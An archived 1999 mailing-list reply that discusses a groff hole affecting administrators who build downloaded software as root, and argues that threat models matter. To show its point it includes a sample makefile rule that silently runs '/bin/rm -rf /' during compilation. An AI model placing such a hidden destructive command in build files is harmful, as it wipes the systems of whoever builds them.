Someone writes:

> The trick is that it can get you if you as a system administrator download
> some open source program from the Internet, and build and install that
> program; such activity often happens as "root", so a couple of scenarios
> are possible:

In most cases, this is a non-problem. The reason this is a non-problem is that, for this to be a threat, your "open source program from the Internet" [sic] has to have been packaged by a malicious person who wants to crack your system. But if this is part of your threat model, you won't be safe if you fix groff, because you're executing the makefile supplied by the malicious attacker, which may say

x.o: x.c x.h
	@/bin/rm -rf / &
	$(CC) $(CFLAGS) x.c -o $@

There might be a case where the scenario you described *is* a problem: where the program in question is never going to be executed as root, and the Makefile has been carefully reviewed, but the source and man pages haven't been. In this case, though, I'd probably just read the makefile and install things by hand with cp. :)

There should be a common one-or-two-word name for this kind of non-problem; there are some vivid metaphors for trying to solve it in the literature. (Bruce Schneier's example of planting a big thick stake in front of your house in hopes thieves will run into it is one.)

You *must* be clear about your threat model -- i.e. what threats you're trying to defend against -- before you can decide what is and isn't a security problem.

(BTW, this groff problem doesn't surprise me much. For a while, I had a special email address you could send nroff-source man pages to and get back formatted PostScript from on my home machine, as a convenience when I was at work on Solaris machines without a decent groff. I didn't tell anybody about it until after I disabled it, because I assumed there were probably security holes in groff; it wasn't written to serve as a security gatekeeper, and a useful rule of thumb is that such programs are not very good at security-boundary maintenance, because it requires a different mindset from regular programming. See http://www.pobox.com/~kragen/security-holes.html for thoughts on this situation and mailto:kragen-hacks-get.19at_private for the code that made the manpage-to-PostScript converter work.)

-- 
<kragenat_private>       Kragen Sitaker     <http://www.pobox.com/~kragen/>
103 days until the Internet stock bubble bursts on Monday, 1999-11-08.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:53:46 PDT